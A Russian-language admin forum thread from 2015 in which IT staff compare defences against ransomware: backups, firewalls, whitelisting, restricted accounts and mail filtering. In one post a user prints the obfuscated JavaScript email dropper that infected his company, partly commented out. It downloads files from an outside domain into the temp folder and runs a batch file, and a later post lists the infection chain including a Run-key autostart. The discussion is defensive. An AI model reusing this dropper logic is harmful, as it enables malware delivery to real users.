|
как защитится от шифровальщиков? | ☑ | ||
---|---|---|---|---|
0
vde69
11.03.15
✎
09:37
|
собственно переодически всплывают темы "у нас все пропало, вирус все зашифровал", не минула сия чаша и нашу компанию, разумеется с 1с все нормально, но у юзеров почта, ексельки и прочее навернулось.
хотелось-бы реальных советов как защищатся... сразу скажу, что НЕ РАБОТАЕТ 1. антивирусы - не работают, по тому как это не вирус... 2. файловые права - не работают, по тому как шифруются данные пользователя а на них права нужны 3. запрет ява, вб, актив-х и прочего, тогда не работают клиент банк, тендерные площадки и еще много чего полезного... |
|||
1
Defender aka LINN
11.03.15
✎
09:39
|
Линейка.
|
|||
2
Кай066
11.03.15
✎
09:40
|
(0) по мануалам клиенты банков должны быть на отдельных компах. А так тотальные бэкапы хардов юзеров или пусть хранят свои данные на серваке и бэкап сервака ил (1) - киздить
|
|||
3
Rebelx
11.03.15
✎
09:42
|
(0) Что работает:
Антивирусы - ибо есть база сигнатур. |
|||
4
Rebelx
11.03.15
✎
09:44
|
+(3) файрвол - доступ в сеть только для разрешенных приложений. ибо шифровальщики как правило из двух частей состоят - загрузчика и шифровальщика.
|
|||
5
vde69
11.03.15
✎
09:50
|
(3) они очень быстро и легко меняются, кроме того могут использовать системные файлы, именно в этом довольно большая проблемма. Например шифрование идет файлом имеющим валидную подпист мелкософта.
(4) использование фаервола частично решит проблемму, но также часть случаев заражения сделает не востановимыми, пример - генерится ключ, шифруется и ключ отправляется на сайт хакеров, потом ключ с локального компа удаляется... Фаервол блочит передачу ключа и все даже вирусописаки не могут расшифровать... |
|||
6
Lama12
11.03.15
✎
09:51
|
(0) Культура работы с неизвестным ПО? Всякие песочницы...
|
|||
7
vde69
11.03.15
✎
09:52
|
если интернет серфинг в песочницу загнать еще можно, то почту не выйдет...
|
|||
8
Кай066
11.03.15
✎
09:52
|
Линух уже предлагали?
|
|||
9
Rebelx
11.03.15
✎
09:53
|
(5)Например шифрование идет файлом имеющим валидную подпист мелкософта - это как?
|
|||
10
vde69
11.03.15
✎
09:53
|
(8) интересное решение, возьмем на заметку...
|
|||
11
Кай066
11.03.15
✎
09:53
|
(7) почту через вэбморду, чё
|
|||
12
vde69
11.03.15
✎
09:54
|
(9) например capicom.dll
|
|||
13
Builder
11.03.15
✎
09:54
|
(7) IMAP для почты не предлагать? Все письма есть на серваке.
|
|||
14
Rebelx
11.03.15
✎
09:55
|
(11) смысл?
(0) Обучение пользователей не предлагать? и принудительный показ расширений файлов |
|||
15
vde69
11.03.15
✎
09:55
|
(13)тоже плюсик
|
|||
16
Господин ПЖ
11.03.15
✎
09:55
|
>не минула сия чаша и нашу компанию, разумеется с 1с все нормально, но у юзеров почта, ексельки и прочее навернулось.
только не говорите что у вас юзеры могут запускать/качать все подряд |
|||
17
Rebelx
11.03.15
✎
09:55
|
(12) врядли винда проверяет все dll в процессе. ИМХО только основной файл процесса
|
|||
18
vde69
11.03.15
✎
09:56
|
(16) вот такую хрень жамкнули
Счет н.286-4 с февраля 2015 г. к оплате - согласовано и подписано бухгалтерией - mаil-аttaсhmеnt_Scаnnеd and Checked by Kaspersky.tхt .js |
|||
19
Rebelx
11.03.15
✎
09:57
|
(18) дай почитать
|
|||
20
Rebelx
11.03.15
✎
09:58
|
(18) почтовый сервер с блокировкой всего активного контента
|
|||
21
vde69
11.03.15
✎
09:58
|
(19) кое чего закоментил :) короче это загрузка под правами юзера
var _$_bfe2=[ "%TEMP%\x5C", "%TEMP%\x5Csecured.bat", "download-attach", "%TEMP%\x5Cattachment.doc", "WScript.Shell", 5 - "ExpandEnvironmentStrings", "Run", "MSXML2.XMLHTTP", "GET", "open", 10-"send", "Scripting.FileSystemObject", "ADODB.Stream", "Open", "Type", 15-"ResponseBody", "Write", "Position", "SaveToFile", "Close", 20-"http://", ".com/word.pdf", "", "attachment.doc", ".com/403.vlt", 25-"403.vlt", ".com/iconv.vlt", "iconv.vlt", ".com/index.vlt", "index.vlt", 30-".com/logs.vlt", "secured.bat"]; var tef=_$_bfe2[0]; //"%TEMP%\x5C" var caller=_$_bfe2[1]; //"%TEMP%\x5Csecured.bat" var lnk=_$_bfe2[2]; //"download-attach" var attc=_$_bfe2[3]; //"%TEMP%\x5Cattachment.doc" var WshShell=CreateObject(_$_bfe2[4]); //"WScript.Shell" //tef=WshShell_$_bfe2[5]; // получаем переменную среды "%TEMP%\x5C" function CreateObject(a) { // return new ActiveXObject(a) } function ecut(caller) { // WshShell_$_bfe2[6] // "WScript.Shell.Run (caller,0,0)" } function ewor(tef) { // WshShell_$_bfe2[6] // "WScript.Shell.Run (tef,1,0)" } function ddq(e,tef) { var d= new ActiveXObject(_$bfe2[7]); //MSXML2.XMLHTTP //d[$bfe2[9]]($bfe2[8],e,0); //MSXML2.XMLHTTP.open(GET,e,0) //d[$bfe2[10]](); //MSXML2.XMLHTTP.send() var b= new ActiveXObject($bfe2[11]); //Scripting.FileSystemObject var c= new ActiveXObject($bfe2[12]); //ADODB.Stream c[$bfe2[13]](); //ADODB.Stream.Open() c[$bfe2[14]]=1; //ADODB.Stream.Type=1 c[$bfe2[16]](d[$bfe2[15]]); //ADODB.Stream.Write(MSXML2.XMLHTTP.ResponseBody) c[$bfe2[17]]=0; //ADODB.Stream.Position=0 c[$bfe2[18]](tef,2); //ADODB.Stream.SaveToFile(tef,2) c[$bfe2[19]](); //ADODB.Stream.Close() } //ddq($bfe2[20]+lnk+$bfe2[21],$bfe2[22]+tef+$_bfe2[23]); //ddq("http://download-attach.com/word.pdf","%TEMP%\x5C\attachment.doc"); try { ewor(%TEMP%\x5Cattachment.doc") } catch(err) { }; //ddq(_$bfe2[20]+lnk+$bfe2[24],$bfe2[22]+tef+$_bfe2[25]); //ddq("http://download-attach.com/403.vlt","%TEMP%\x5C\403.vlt"); //ddq(_$bfe2[20]+lnk+$bfe2[26],$bfe2[22]+tef+$_bfe2[27]); //ddq("http://download-attach.com/iconv.vlt","%TEMP%\x5C\iconv.vlt"); //ddq(_$bfe2[20]+lnk+$bfe2[28],$bfe2[22]+tef+$_bfe2[29]); //ddq("http://download-attach.com/index.vlt","%TEMP%\x5C\index.vlt"); //ddq(_$bfe2[20]+lnk+$bfe2[30],$bfe2[22]+tef+$_bfe2[31]); //ddq("http://download-attach.com/logs.vlt","%TEMP%\x5C\secured.bat"); //ecut(_$bfe2[22]+caller+$_bfe2[22]); //ecut("%TEMP%\x5C\secured.bat"); |
|||
22
Builder
11.03.15
✎
09:58
|
(18) Я периодически делаю рассылку всем пользователям с напоминанием не открывать подобные письма и файлы. Помогает.
Хотя понимаю что этого недостаточно. |
|||
23
Кай066
11.03.15
✎
09:59
|
Здравствуйте, я таджикский вирус...
|
|||
24
Кай066
11.03.15
✎
10:00
|
(0)в милицию обратились?
|
|||
25
polosov
11.03.15
✎
10:03
|
||||
26
Гёдза
11.03.15
✎
10:04
|
А что разве в MS Exchange нельзя запретить передачу и открытие скриптов и ехешников?
|
|||
27
zak555
11.03.15
✎
10:04
|
дейсующий спобосб --- предыдущие версии
|
|||
28
Гёдза
11.03.15
✎
10:05
|
Ну и плюс, файлы хранить в метсах, которые бэкапятся
|
|||
29
Господин ПЖ
11.03.15
✎
10:09
|
от имени 1с тоже рассылают: http://1c.ru/news/info.jsp?id=19645
|
|||
30
vlandev
11.03.15
✎
10:24
|
Скажите в каком антивирусе есть блокировщик создания файлов с опасными расширениями типа *.exe, *.com, *.bat, *.cmd и т.п. ? Неужели до этой элементарщины еще не додумался никакой производитель антивируса?
|
|||
31
Rebelx
11.03.15
✎
10:30
|
(21) сложно от этого защититься. Скрипт скачивает батник и pgp (под другими именами), ничего запрещенного и подозрительного.
потом асимметричное шифрование с помощью pgp в данном случае помог бы фаирвол - он бы возможно не дал скачать нужные файлы. Я прям сейчас запретил wscript лезть в сеть. |
|||
32
zak555
11.03.15
✎
10:31
|
(30) они все пропускают
|
|||
33
Rebelx
11.03.15
✎
10:31
|
(21) выложи оригинальный файл - хочу антивирус на него натравить
|
|||
34
zak555
11.03.15
✎
10:31
|
(31) можно только запретить все, а разрешить определённые действия
|
|||
35
zak555
11.03.15
✎
10:32
|
зашифрованы файлы keybtc@gmail_com -- тут я нарвался на вирус
|
|||
36
Rebelx
11.03.15
✎
10:33
|
(34) у меня режим обучения - что файрвол знает - не спрашивает. остальное - спрашивает. но wscript - это виндовый файл, файрвол его знает, поэтому запретил
|
|||
37
Rebelx
11.03.15
✎
10:33
|
+(36) я запретил
|
|||
38
vlandev
11.03.15
✎
10:34
|
(32) Конечно пропускают , по тому что проверяют сигнатуру. надо что бы тупо при создании файла с опасным расширением ядро блокировало создание такого файла.
|
|||
39
Кай066
11.03.15
✎
10:35
|
(38) а если создать с безопасным, а потом переименовать?
|
|||
40
vde69
11.03.15
✎
10:35
|
(21) я тебе лучше почтой отправлю. так безопаснее...
|
|||
41
Rebelx
11.03.15
✎
10:36
|
(40) спасибо
|
|||
42
vlandev
11.03.15
✎
10:37
|
(39) Тоже блокировать.
|
|||
43
Кай066
11.03.15
✎
10:39
|
(42) Банки с РБК грузиться не будут)
|
|||
44
vlandev
11.03.15
✎
10:42
|
(43) А если запускать банк-клиент из под другого не привелегированного аккаунта? Что бы у этого аккаунта не было доступа к юзерским документам и 1С-у.
|
|||
45
Alex84253
11.03.15
✎
10:42
|
Очень просто ставишь отдельный компьютер для бекапов, на нем выключаешь сетевой доступ, ставишь ftp сервер, на компьютерах юзверей ставишь программу Cobian Backup, ей делаешь бекапы на свой ftp. Так же есть вариант с авто подключение и отключением к облаку через WebDav.
|
|||
46
Rebelx
11.03.15
✎
10:44
|
(0) я сейчас в файрволе установил максимальный уровень защиты системы - запрос перед запуском любого нового или измененного приложения.
|
|||
47
Rebelx
11.03.15
✎
10:45
|
(45) это да, но это не защита от самой проблемы
|
|||
48
Кай066
11.03.15
✎
10:46
|
(44) я имел ввиду с рбк в 1С
|
|||
49
vde69
11.03.15
✎
10:50
|
(46) письмо получил? кликай смело :)))))))
в ява скрипте закоменть запуск приложений (там 2 места) и кликни, проверим как фаервол тяфкнет... |
|||
50
vlandev
11.03.15
✎
10:53
|
(48) А оно там экзешники создает? По любому , можно сделать какие то исключения , фильтр приложений , допустим процессу с именем 1С разрешено все. Ну или по паролю отключать этот блокиратор , иначе нельзя будет ничего установить вообще. Кстати вроде в AVZ что то такое есть , там какой AVZ гвард имеется , но он жестко блокирует даже запись в реестр по моему.
|
|||
51
Mihenius
11.03.15
✎
10:58
|
Часть шифровальщиков можно отсечь - юзерам дать только юзерские права. Увы новым шифровальщикам достаточно юзерских прав.
Через доменные или локальные политики создать "белый список" приложений по хэшу. Из минусов - список нужно постоянно обновлять. Аналогичная функция есть в антивирусах. В корпоративных версиях - централизованная. Про бэкапы в недоступном месте или хотя бы в папке с правами закрытыми всем, кроме спец пользователя бэкапера - знают все. Мелким и средним конторам - можно перевести обслуживание почты на pdd.yandex.ru (Почти все такие письма попадут в спам yandex) Настроить брандмауер. Как уже писалось, в худшем случае сделает невозможным расшифровку даже злоумышленниками. ПС: И еще 1 момент. Поймали подобную фигню, обязательно шлем в антивирусные компании. Может кому-то принесем пользу и получим + в карму ) |
|||
52
Rebelx
11.03.15
✎
10:59
|
(49) нет :(
|
|||
53
KSN
11.03.15
✎
11:02
|
(49) Выкладывай уж на обменник, все ждут!!
|
|||
54
kobzon2
11.03.15
✎
11:04
|
Где-то читал что резервные копии можно защитить переименовав разрешения в произвольные. Но это пока шифровщики работают выборочно.
|
|||
55
Torquader
11.03.15
✎
11:04
|
Во-первых, если грамотно настроить архивацию и перенаправить важные папки пользователя на сервер, то "нерадивые работники" потеряют только то, что не успело скопироваться, то есть день-два.
(У меня, когда что-то запускали и терялись файлы - я важные восстанавливал из БэкАпа, а про остальное говорил - сами виноваты). Во-вторых, можно сделать так, что почта и браузер запускаются от отдельного пользователя, у которого нет прав даже на рабочий стол, только пользователи не смогут сразу открывать из браузера файлы - им нужно будет их сохранить, а потом открыть - соответственно, при сохранении уже можно смотреть, что там есть. Также никто не мешает написать сценарий, который будет запускать приложения от имени другого пользователя для нужных файлов. В-третьих, клиент-банк и прочие важные приложения априори запускаются от специального пользователя с правами администратора, чтобы всё, что работает на компьютере пользователя так просто не получало к нему доступ. Тогда и java будет доступна только тем, кому она нужна. Действенным методом является перехват и запрет запуска всего, что не разрешено, что умеет Windows из коробки. Также, если грамотно настроить работу с файлами по сети, то можно не только отслеживать момент записи или удаления файла, но и видеть все предыдущие версии - иногда одного этого действия хватает, чтобы пользователи были довольны, так как некоторые вирусы не шифруют, а просто всё удаляют. К сожалению, так как Windows немного дырявая, то стопроцентной гарантии того, что все спасутся, никто не даст. Поэтому, не забыть проводить беседы с пользователями, объясняя, что если кто-то что-то открывает, то он сам виноват. P.S. особенно полезно в реестре при запуске .scr поставить вывод сообщения о "хороших качествах пользователя". |
|||
56
vde69
11.03.15
✎
11:04
|
(52) послал повторно, первое вернулось как спам...
|
|||
57
Garikk
11.03.15
✎
11:06
|
(55) <К сожалению, так как Windows немного дырявая>
Зачастую руки админа не достаточно умелые, а не Windows дырявая |
|||
58
Вебер
11.03.15
✎
11:08
|
поднять свой почтовик и поставить запрет на скрипты и все чужеродное, уже предлагали???
|
|||
59
Torquader
11.03.15
✎
11:08
|
(57) Повышение прав через dll фильтра печати иногда прокатывает, к сожалению, не везде эти "фокусы" заткнули - а не давать пользователю права управления принтером - немного жестоко.
(36) Ещё очень хорошо помогает изменение расширений для сценариев на другие - тогда все ваши сценарии прекрасно работают, а что-то, что пользователь пытается запустить - он видит просто в текстовом редакторе. |
|||
60
Torquader
11.03.15
✎
11:11
|
(59)+ просто у меня какой-то замечательный вирус пытался что-то с подсистемой печати сделать, после чего машина уже ничего не печатала до перестановки Windows (точнее перезаписи всей службы печати), но что-то он от неё очень хотел, если из dll пытались запустить exe-файл.
|
|||
61
Mihenius
11.03.15
✎
11:11
|
(55) Я использую для "таких" приложений
http://admilink.narod.ru/admilink.htm Хотя для большинства клиент-банков и прочих похожих приложений админские права нужны только для настройки, во время работы они не нужны. |
|||
62
Torquader
11.03.15
✎
11:14
|
(61) Клиент-банку нужен отдельный пользователь, чтобы оградить его от всего остального и разрешить запускать нужные программы. Да и профиль в браузере будет отдельный. Зловреды очень любят портить настройки браузеров и прописываться туда как расширения.
Ещё очень полезно запретить пользователю запись в автозапуск (у меня, правда, и администраторам тоже запрещено) часть зловредов отваливается с ошибкой на данной операции. |
|||
63
vde69
11.03.15
✎
11:39
|
что-то Rebelx молчит, видать получил письмо :)
|
|||
64
Rebelx
11.03.15
✎
12:20
|
(63) да, был занят. воспроизводил схему защиты на виртуалке
в принципе - враг не прошел. Итак файрвол - аутпост заблокирован доступ в сеть для wscript - скрипт сразу выдает ошибку при скачивании файла Если отключить отслеживание активности - максимум, т.е. вопрос при запуске новых и измененных приложений. Сработало. |
|||
65
vde69
11.03.15
✎
12:24
|
(64) ну ставить на все локалки оутпост и потом иметь геморой бегая по сотне клиентов после каждого обновления - это не айс...
хотя например для админов (и прочих с большими правами) - надо посоветовать... |
|||
66
Гёдза
11.03.15
✎
12:25
|
(65) все они имеют корпоративные версии с удаленным управлением
|
|||
67
nva_15
12.03.15
✎
07:00
|
(0) Можно запускать интернет только из виртуальной машины, которая будет стартовать из чистого образа каждый раз при запуске. На физической машине - никакого интернета. При такой схеме в виртуалке даже антивирус не нужен.
|
|||
68
zak555
12.03.15
✎
07:04
|
(67) грамотные вири используют дырки виртуалок и могут пробраться "ао внешний мир"
|
|||
69
Skom
12.03.15
✎
07:23
|
У одного клиента 2 раза в течении месяца шифровали, там базы 1с77, урбд, восстановить вообще не проблема.
проблема была в 2-х файлах excel, в которых у него (маленькое ИП) было много полезного. обратился ко мне после шифрования, я предложил ему узнать цену расшифровки и, если приемлема (ценность информации перекрывает цену восстановления) то заплатить. В общем он связался с ними, выкатили 20 тsh/ - а как я могу быть уверен, что вы мне расшифруете, а не просто возьмете деньги и обманете меня? - не проблема, пришлите нам 2 любых файла, мы вам докажем, что можем расшифровать в общем, он отправляет им эти 2 самых важных файла, они расшифровывают, он говорит спасибо и посылает))) остальное я восстановил. после этого поставил ему вин8, сделал его пользователя "кастрированным" по правам, сделал пользователя со сложным паролем с админскимим правами, что бы он сам мог установить нужное ПО. сделал шифрованный диск (бит локер) что бы он архивы на него складывал, научил в облако складывать нужную инфу, провел инструктаж, какие письма нельзя открывать. Пока больше проблем нету. |
|||
70
Skom
12.03.15
✎
07:24
|
20 тыс.руб
|
|||
71
Skom
12.03.15
✎
07:25
|
+(69) до этого стояла вин2003, смотрел в логах, примерно в 5 утра создается новый пользователь, и начинается веселуха по шифрованию.
|
|||
72
mobi
12.03.15
✎
08:14
|
Ну во первых есть способ номер 1. Поставь Линукс и не работай под рутом. Вариант 2 настрой пользователям нормальные права и поставь все заплатки.
|
|||
73
kobzon2
12.03.15
✎
08:18
|
(72) И какая заплатка запрещает запуск js?
|
|||
74
vde69
12.03.15
✎
08:23
|
(72) >>>Вариант 2 настрой пользователям нормальные права и поставь все заплатки.
не прокатит к сожалению, эта гадость работает на ограниченых правах (67) ага, клиент банк, 1с с ее загрузкой курсов валют, почта, тендера, обмен с сайтом, такском (и еще куча чего) все это будет запускатся с чистого образа на виртуалке? пока вижу только такое решение тонкие клиенты на линухе входят в терминал, в терминале белый список приложений... |
|||
75
mobi
12.03.15
✎
08:26
|
(74) Браузер с нормальными заплатками и с настроенными правильно правами не может работать с левыми файлами. А эта фигня лезет именно через браузер.
|
|||
76
spectre1978
12.03.15
✎
08:31
|
(18) ну вообще-то почтовый клиент любой вменяемый даже с дефолтными настройками не должен открыть прямо из себя такой файл ни при каких обстоятельствах. Нужно сохранять куда-то и уже оттуда запускать. Неужели у вас люди настолько непуганые?
|
|||
77
DrZombi
гуру
12.03.15
✎
08:35
|
(72) Линух, это как с неуловимым ДЖО - "не потому, что он не уловим, потому, что он мало кому нужен" :)
|
|||
78
Провинциальный 1сник
12.03.15
✎
08:35
|
(76) "Акт сверки ОАО Сбербанк.xls .exe" откроют 95% бухгалтеров из тех, кто никогда с подобным не сталкивался, и каждый пятый из тех, кто уже когда-то пострадал от подобного. Ибо рабочее время, начальство задание дало срочное, а тут еще какие-то письма валются..
|
|||
79
DrZombi
гуру
12.03.15
✎
08:37
|
(78) Выход один, правильно настраивать Екченджи. Находить софт, который бы проверял всю приходящую почту, в плоть до архивов и вырезал все такие архивчики.
|
|||
80
vde69
12.03.15
✎
08:42
|
(75) я тебе раскажу как работает то, что к нам залезло
1. юзер запускает js он выполняется в "безопасной машине", 2. скрипт посылает http запрос и скачивает несколько файлов и кладет его в темповый каталог, один файл бат. 3. скрипт запускает бат файл, он тоже запускается в "безопасной машине" 4. бат файл запускает шелл и ей прописывает авторун на один из загруженых файлов 5. после ребута запускается авторун уже с не в "безопасной машине" а под правами юзера... все мы вылезли из песочницы... |
|||
81
PLUT
12.03.15
✎
08:47
|
(80) бесплатный комод файрволл при изменениях реестра вопросы задает "а хотите ли вы поиметь изменения в реестре?"
|
|||
82
vde69
12.03.15
✎
08:50
|
почему хватает прав на HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run это конечно вопрос....
|
|||
83
vde69
12.03.15
✎
08:51
|
(81) бух который нажал на js совершенно наждет ДА в комоде
|
|||
84
Провинциальный 1сник
12.03.15
✎
08:59
|
Ставим линукс, в нем создаем раздел btrfs, на него пишем образы дисков виртуальной машины с виндой. Каждый час (день) создаем снапшот файловой системы, на которой лежат виртуалки. В результате - вирусы не страшны, если что, откатываемся на нужный момент и всё. Вполне реально, только много возни с настройками.
Вот я мечтаю, что чьи-нибудь умные руки сделают дистр линукса "версионный гипервизор", где бы виртуалка грузилась автоматически, а в гипервизор попасть можно было по хоткею, возможно с вводом пароля, а дальше выбрать версию для восстановления или задать настройки версионирования.. и ничего больше не надо. |
|||
85
vde69
12.03.15
✎
09:05
|
(84) класссс... есть сетевой диск в котором 10 терабайт сканов пользователей и ты его каждую ноч будешь архивировать фулом? неужели ты не слышал про диф бекапы :)
|
|||
86
kumena
12.03.15
✎
09:07
|
(84) объем данных может быть настолько большой что за ночь даже легко пережать не получится, не то что уже перекинуть по сети.
|
|||
87
Провинциальный 1сник
12.03.15
✎
09:08
|
(85) Вы просто не курсе про фичи btrfs)
|
|||
88
Провинциальный 1сник
12.03.15
✎
09:09
|
(86) Снапшоты в btrfs создаются за секунды
|
|||
89
ShoGUN
12.03.15
✎
09:17
|
(80) Запрет на исполнение любых программ, лежащих в неположенных местах :) Политиками безопасности. Но требует длительной настройки. Соотвественно, включение UAC и хрен что запустится без разрешения.
|
|||
90
Sammo
12.03.15
✎
09:32
|
(74) Непосредственно не сталкивался с шифровальщиками.
Но правильно я понимаю, что дыры - это почта и броузер. Обмен с 1с, загрузка валют, банк-клиент не являются проблемой. Т.е. если вынести в зону риска броузер и почту, то должно помочь |
|||
91
Sammo
12.03.15
✎
09:33
|
+90 Кстати, в браузере NoScript поможет?
|
|||
92
vde69
12.03.15
✎
09:34
|
(91) половина сайтов не будет работать...
(90) вынести почну невозможно... |
|||
93
Sammo
12.03.15
✎
09:36
|
(92) А они нужны? В некоторых конторах (банки) интернет вообще по списку разрешенных сайтов (про жесткие варианты с 1 компом с интернетом на отдел я молчу).
|
|||
94
Sammo
12.03.15
✎
09:37
|
+ практика - хранить важные документы на сетевой шаре, которая периодически архивируется.
|
|||
95
vde69
12.03.15
✎
09:38
|
(93) нужны, например тендерные площадки, различные каталоги и т.д.
белый список сайтов - к сожалению не реально... |
|||
96
aka AMIGO
12.03.15
✎
09:43
|
(18) Что-же здесь должно было насторожить? Я-б открыл, т.к. не вижу криминала, ни в названии, ни в успокаивающем тексте - а-ля проверено всей лабораторией каперского.. при его личном участии :)
На что, собственно, следует обращать внимание? |
|||
97
vde69
12.03.15
✎
09:56
|
(96) в этом и есть проблемма... ну значек разный, ну еще обернуто в зип, но в целом красиво :)
у нас даже админ жамкнул :) |
|||
98
Вебер
12.03.15
✎
10:25
|
на шлюзе запрет сделай, этож плевое дело...
|
|||
99
vde69
12.03.15
✎
10:33
|
(98) запрет на что? на HTTP запрос ???
|
|||
100
Вебер
12.03.15
✎
10:40
|
(99) на файлы js и ежеси с ними
|
|||
101
vde69
12.03.15
✎
10:48
|
(100) :) сам пробовал :)))
подскажи модель которая умеет фильтровать HTTPS по содержанию... |
|||
102
Torquader
12.03.15
✎
13:22
|
(82) На все автораны в реестре ставится разрешение для запись только для операционной системы, так как исполнения MsiExec установки программ из под неё родимой выполняется.
А Администратору, как и обычным пользователям, порезать права на запись и изменение. P.S. в Windows как и в Linux понятие "песочница" отсутствует, как класс - есть только урезанные в правах пользователи - но это совершенно разные вещи. |
|||
103
Torquader
12.03.15
✎
13:23
|
(101) Фильтровать что-то бессмысленно, так как в содержимое может быть закодировано и восстановлено на клиенте при помощи простого скрипта, а если части его грузятся с разных серверов, то и фильтратор не сможет понять, что и к чему.
|
|||
104
Torquader
12.03.15
✎
13:28
|
Отдельный комп для интернета спасает от шифровальщиков только частично, а зато использование flash-дисков позволяет разносить "традиционные" вирусы.
Очень труднопобедимыми оказались вирусы, которые ставят в exe-файл иконку папки, а папку с файлами скрывают - в итоге - ничего не понимающий пользователь "запускает" такую папку на ура. |
|||
105
zyto
12.03.15
✎
13:32
|
(0)Уже отвечал на вопрос какой антивирус?
|
|||
106
Krendel
12.03.15
✎
13:35
|
Храните файлы в документообороте, работайте под терминалами с ограниченным запуском программ и будет вам счастье
|
|||
107
Сержант 1С
модератор
12.03.15
✎
14:34
|
Грамотно организованное резервирование и архивирование - ответ на 80% админских вопросов. Да хотя бы на публичной шаре ссаный шедоу копи настроить - уже задница прикрыта.
|
|||
108
IШаман
12.03.15
✎
14:35
|
(0) Резервное копирование плюс нормальные политики безопасности.
|
|||
109
DGorgoN
12.03.15
✎
14:53
|
(107) +1
|
|||
110
kobzon2
12.03.15
✎
15:27
|
А кто-нибудь шарит в яве? Хотелось бы посмотреть пример исполняемого файла с разрешением js. Например чтобы выводил сообщение Hello World в среде windows?
|
|||
111
kofeinik
12.03.15
✎
15:34
|
(107) теневая копия не поможет, оригинал же стирается, просто рядом пишется файл[email protected]
|
|||
112
Сержант 1С
модератор
12.03.15
✎
15:39
|
(111) учи матчасть
|
|||
113
Зеленый Кот
12.03.15
✎
15:52
|
<script language="JavaScript">
var fso, f1; fso = new ActiveXObject("Scripting.FileSystemObject"); f1 = fso.CreateTextFile("c:\\testfile.txt", true); </script> |
|||
114
Зеленый Кот
12.03.15
✎
15:53
|
js -это не ява - это JavaScript
|
|||
115
kobzon2
12.03.15
✎
16:15
|
Кстати если запретить запуск приложения wscript.exe, то js не запустится. Но чем это чревато для работы пользователей?
|
|||
116
Torquader
12.03.15
✎
17:31
|
(115) Во flash и java есть возможность выполнить JavaScript через MSScriptControl - элемент выполнения сценариев, который в WScript.exe не очень-то относится.
Полный запрет выполнения JavaScript, VbScript и HTA-приложений не позволит запускать даже некоторые системные утилиты (написанные на том же hta). Пользователи просто заметят, что некоторые программы не запускаются, а другие - неправильно работают. Однако, от вируса это не спасёт - он создаёт ярлык из которого запускается файл уже с произвольным расширением. |
|||
117
Старуха Юзергиль
12.03.15
✎
17:35
|
(0)Я посылала в лабораторию Касперского файлы до и после шифровки. Они прислали расшифровщик, все восстановилось, только даты файлов, естественно изменились на дату восстановления.
Переписывалась через личный кабинет |
|||
118
Domovoi
12.03.15
✎
17:41
|
(117)А если им послать только зашифрованные файлы, то они их расшифруют?
|
|||
119
Старуха Юзергиль
12.03.15
✎
19:01
|
(118)Думаю, да, ведь они должны убедиться, что расшифровщик сработал нормально. Но вышлют ли их тебе? - не факт:)
|
|||
120
Старуха Юзергиль
12.03.15
✎
19:06
|
В принципе если ТС выслал бы мне парочку файлов для проверки - мне нетрудно было попробовать их расшмфровать присланным мне расшифровщиком. Чисто для интереса
|
|||
121
kobzon2
12.03.15
✎
19:16
|
(120) А какое расширение добавляет ваш шифровщик?
|
|||
122
Старуха Юзергиль
12.03.15
✎
19:21
|
(121) Crypted - вроде так. Я запускала расшифровку с удалением зашифрованных, так что пишу по памяти.
|
|||
123
iHell
12.03.15
✎
19:43
|
объясните тому кто не в теме, в почтовике разве нельзя заблокировать на скачивание файлы с расширением .js, .rar, .ехе и тому подобное ?
|
|||
124
kobzon2
12.03.15
✎
19:47
|
(123) Почтовики разные бывают. В Оутлуке исполняемые по-умолчанию блокируются. А с архива без проблем запускаются.
|
|||
125
Старуха Юзергиль
12.03.15
✎
19:52
|
(123)У меня гости были, получали свою почту на моем компьютере. Ну и... вот...
|
|||
126
Старуха Юзергиль
12.03.15
✎
19:53
|
Приезжали два чувака из краевого отдела "К", разъяснили, что чуваки-шифровальщики круче их, и поэтому писать заявление все равно бесполезно
|
|||
127
bse
12.03.15
✎
21:32
|
где-то читал что шифровальщики не работают с теневыми копиями... т.е. настраиваем например часовое создание копий, если что восстанавливаем. Но думаю что это актуально только для документов, что будет с целостностью ИБ хз...
|
|||
128
Старуха Юзергиль
12.03.15
✎
21:37
|
(127)По-моему, нормально будет
|
|||
129
zak555
12.03.15
✎
21:47
|
(127) в начал ветки про это написал
для бд это ернуда |
|||
130
DJ Anthon
12.03.15
✎
22:33
|
вроде была статейка в инете, что только кис домашний ловит, остальные реагируют, но шифрованию не мешают. ну, я и так его приверженец, воркспейс ненавижу с древних времен, когда он 7ку ронял даже не запущеным.
|
|||
131
Еврейчик
12.03.15
✎
22:35
|
Я храню все в облаке и если с компом что случится, сразу заводское восстановление настроек и приступаю к немедленной работе.
|
|||
132
DJ Anthon
12.03.15
✎
22:36
|
(127) бывает, что поздно спохватываются, когда уже в копиях зашифровано все.
(131) сомневаюсь, что мне будет удобно и дешево работать с 10 ТБным облаком... |
|||
133
Alexor
12.03.15
✎
22:42
|
(130) Не ловит этот КИС шифровальщик.
|
|||
134
DJ Anthon
12.03.15
✎
22:45
|
(133) жаль. но я ему как-то скармливал свой. вроде реагировал. но лечение уже опосля проводилось, мы с админом по пятерику скидывались, восстановили. а из якутска тетка уже 30 заплатила, (полтора биткойна). жадность этих уродолв не знает границ. сейчас поди уже под сотню требуют (в рублях).
|
|||
135
DJ Anthon
12.03.15
✎
22:46
|
кстати, тот пятерик уже окупился многократно, ибо из-за того вируса мне в два раза цену договора подняли, а прошло уже три года ;)
|
|||
136
kofeinik
12.03.15
✎
22:47
|
(112) а что учить-то, если про версионность файлов, то так оно и есть, если про копию всего тома - то это тот же архив
|
|||
137
Вебер
13.03.15
✎
04:27
|
ша проверим нод и каспер на профпригодность...
|
|||
138
TankerM
13.03.15
✎
07:04
|
Пока спасает SRP (Software Restriction Policies)
|
|||
139
Провинциальный 1сник
13.03.15
✎
07:28
|
(136) Так у каталогов тоже есть версии)
|
|||
140
ololoraise
13.03.15
✎
08:34
|
только вчера смотрел на виртуалке. Пришел по почте файл с оконцовкой cmd.
обычный exe - с сайта **** скачивает два файла sys и rar Дальше переименовывает в sys.exe и rar.exe ну а дальше я думаю понятно все. |
|||
141
ololoraise
13.03.15
✎
08:36
|
+140 да и вчера антивирь не ругался на сайт, сегодня уже не пускает.
|
|||
142
zak555
13.03.15
✎
08:36
|
(130) кис -- первый пропускальщик...
у меня как раз клиент словил этот шифратор, но на машине был кис |
|||
143
zak555
13.03.15
✎
08:38
|
кстати, отличный бизнес у ребят
осталось им открыть сеть фрачайзинга, чтобы его партнёры боролись с шифровкой за деньги |
|||
144
ololoraise
13.03.15
✎
08:40
|
(142) вроде полгодика назад поговаривали, что кис обучили ловить кодировщики и бета тест полным ходом идет.
Значит на месте так и топчаться. |
|||
145
IVT_2009
13.03.15
✎
09:03
|
